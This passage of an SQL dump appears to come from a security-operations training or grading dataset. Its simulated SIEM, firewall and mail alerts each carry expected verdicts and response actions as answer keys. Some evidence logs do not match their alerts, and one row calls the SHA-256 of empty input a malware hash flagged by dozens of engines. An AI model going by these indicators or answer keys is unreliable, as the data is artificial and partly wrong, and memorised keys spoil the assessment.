4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"source_username\\\":\\\"jdoe\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"classified_project_files.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_reason\\\":\\\"Exfiltration attempt to known malicious IP\\\",\\\"reference\\\":\\\"Lazarus Group TTPs\\\",\\\"related_malware\\\":\\\"WannaCry\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1371, 'Communication with North Korean IPs', 'high', 'Firewall and DNS logs', 'Continuous communication is established with IPs linked to North Korea, confirming the involvement of Lazarus Group. The compromised system is maintaining connection with an external IP associated with command and control activities.', 'Command and Control', 'T1102 - Web Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T09:45:23Z\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"203.131.222.102\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"malware_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"dns_query\":\"malicious-domain.example.com\",\"user\":\"jdoe\",\"event_id\":\"FW-20231015-0001\"}', '2026-03-01 23:03:23', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.131.222.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known Lazarus Group C2 server.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Associated with suspicious activity but not conclusively malicious.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious-domain.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenDNS\",\"verdict\":\"malicious\",\"details\":\"Domain associated with known APT infrastructure.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account associated with the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1372, 'Brute Force Attack Detected from Malicious IP', 'high', 'Splunk', 'Multiple failed login attempts detected from a known malicious IP address targeting user accounts.', 'Brute Force', 'T1110', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T14:32:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"corp-server01\",\"failed_attempts\":\"25\"}', '2026-03-02 03:07:37', '2026-03-10 22:16:26', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Repeated login failures from a known malicious IP indicate a brute force attempt.\"}', 'Novice', 'SIEM', 1, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.891Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:32:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.891Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:32:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.891Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:32:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.891Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:32:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.891Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:32:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1373, 'Malware Detected via Suspicious Process Execution', 'critical', 'Elastic SIEM', 'A process execution was detected involving a file with a known malicious hash.', 'Malware', 'T1059', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T10:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.100\",\"hostname\":\"workstation-07\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c malicious.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}', '2026-03-02 03:07:37', '2026-03-09 02:32:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 57 AV engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to execute known malware\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is known to be malicious, confirming the presence of malware.\"}', 'Novice', 'SIEM', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.893Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c malicious.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.893Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c malicious.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.893Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c malicious.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.893Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c malicious.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.893Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c malicious.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1374, 'Phishing Email Detected with Malicious URL', 'high', 'Proofpoint', 'A phishing email was received containing a malicious URL designed to harvest credentials.', 'Phishing', 'T1566', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T09:50:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.50\",\"email_sender\":\"spoofed-ceo@fakecompany.com\",\"domain\":\"fakecompany.com\",\"url\":\"http://phishing-portal.com/login\",\"username\":\"victim@company.com\"}', '2026-03-02 03:07:37', '2026-03-07 10:38:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"spoofed-ceo@fakecompany.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address known for phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishing-portal.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and URL are known to be part of phishing attacks, targeting user credentials.\"}', 'Novice', 'SIEM', 1, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected with Malicious URL\",\"date\":\"2026-03-02T13:55:06.895Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1375, 'Failed Login Attempts from Internal IP', 'medium', 'Azure Sentinel', 'Numerous failed login attempts detected from an internal IP, indicating potential unauthorized access attempts.', 'Brute Force', 'T1110', 0, 'Closed', 225, '{\"timestamp\":\"2026-03-02T13:27:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.0.5\",\"username\":\"testuser\",\"hostname\":\"internal-server\",\"failed_attempts\":\"15\"}', '2026-03-02 03:07:37', '2026-03-07 11:41:37', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address detected\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"testuser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login failures are from an internal IP, likely due to a misconfiguration or user error.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.897Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:27:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":\\\"15\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.897Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:27:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":\\\"15\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.897Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:27:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":\\\"15\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.897Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:27:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":\\\"15\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.897Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:27:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":\\\"15\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1376, 'Suspicious Domain Access Detected', 'medium', 'Wazuh', 'Access to a suspicious domain detected, possibly indicating a phishing attempt.', 'Phishing', 'T1566', 0, 'Closed', 225, '{\"timestamp\":\"2026-03-02T11:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"203.0.113.150\",\"domain\":\"suspicious-website.com\",\"username\":\"employee1\"}', '2026-03-02 03:07:37', '2026-03-07 11:43:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"suspicious-website.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain flagged for potential phishing\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.150\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP listed in suspicious activity reports\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"While the domain appears suspicious, no malicious activity has been confirmed.\"}', 'Novice', 'SIEM', 1, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.898Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"203.0.113.150\\\",\\\"domain\\\":\\\"suspicious-website.com\\\",\\\"username\\\":\\\"employee1\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.898Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"203.0.113.150\\\",\\\"domain\\\":\\\"suspicious-website.com\\\",\\\"username\\\":\\\"employee1\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.898Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"203.0.113.150\\\",\\\"domain\\\":\\\"suspicious-website.com\\\",\\\"username\\\":\\\"employee1\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.898Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"203.0.113.150\\\",\\\"domain\\\":\\\"suspicious-website.com\\\",\\\"username\\\":\\\"employee1\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.898Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"203.0.113.150\\\",\\\"domain\\\":\\\"suspicious-website.com\\\",\\\"username\\\":\\\"employee1\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1377, 'Malicious Email Attachment Detected', 'critical', 'Proofpoint', 'An email was received containing an attachment with a known malicious file hash.', 'Phishing', 'T1566', 1, 'investigating', 254, '{\"timestamp\":\"2026-03-02T07:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.75\",\"email_sender\":\"invoice@legitcompany.com\",\"attachment_hash\":\"6dcd4ce23d88e2ee956d7f4c8f3c3c6d\",\"username\":\"finance@company.com\"}', '2026-03-02 03:07:37', '2026-03-06 07:27:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"6dcd4ce23d88e2ee956d7f4c8f3c3c6d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 62 AV engines\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"invoice@legitcompany.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address used in previous phishing campaigns\"}}],\"expected_actions\":[\"block_hash\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Attachment hash is widely recognized as malicious, confirming the phishing attempt.\"}', 'Novice', 'SIEM', 1, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Malicious Email Attachment Detected\",\"date\":\"2026-03-02T13:55:06.900Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1378, 'Unauthorized Access Attempt Detected from Malicious IP', 'high', 'Splunk', 'An unauthorized access attempt detected from a known malicious IP address targeting a sensitive server.', 'Brute Force', 'T1110', 1, 'investigating', 235, '{\"timestamp\":\"2026-03-02T16:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.100\",\"username\":\"admin\",\"hostname\":\"sensitive-server02\",\"failed_attempts\":\"30\"}', '2026-03-02 03:07:37', '2026-03-03 20:14:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 935 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"High-privilege internal account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Login failures from a high-risk IP suggest a targeted attack on admin accounts.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.901Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"sensitive-server02\\\",\\\"failed_attempts\\\":\\\"30\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.901Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"sensitive-server02\\\",\\\"failed_attempts\\\":\\\"30\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.901Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"sensitive-server02\\\",\\\"failed_attempts\\\":\\\"30\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.901Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"sensitive-server02\\\",\\\"failed_attempts\\\":\\\"30\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.901Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 